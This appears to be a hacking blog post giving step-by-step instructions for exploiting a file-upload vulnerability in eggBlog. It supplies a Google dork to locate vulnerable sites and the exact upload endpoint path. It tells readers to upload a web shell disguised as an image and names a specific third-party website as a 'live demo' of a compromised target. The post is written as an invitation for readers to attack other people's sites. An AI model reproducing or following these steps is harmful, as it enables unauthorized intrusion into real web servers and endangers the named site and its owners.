Menu
 

So here is a new eggBlog Vulnerability that allow user to upload arbitrary files (if you know what i mean ha ha :) ).
lets get into it.
Hack Using Shell Upload
Go to google type powered by eggBlog.net in search box.
Google Dork:"powered by eggBlog.net"
You will get a list of search result now choose a link(like shown below)

Select any url (http://xyz.com/[path])and replace it with this one
http://xyz.com/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Hack Using Shell Upload
now all you have to do now is upload you file(shell/whatever you like )
and access it with this kina url.

http://server/[path]/photos/uploads/shell.php.jpg

Live demo:

  • http://www.websitesbyblake.com/

  • http://www.websitesbyblake.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

  • http://www.websitesbyblake.com/photos/uploads/hacked.gif

    So All the best hackers :)
  • Post a Comment

    Post a Comment

    Feel Free To Ask Your Query we Love To Answer

     
    Top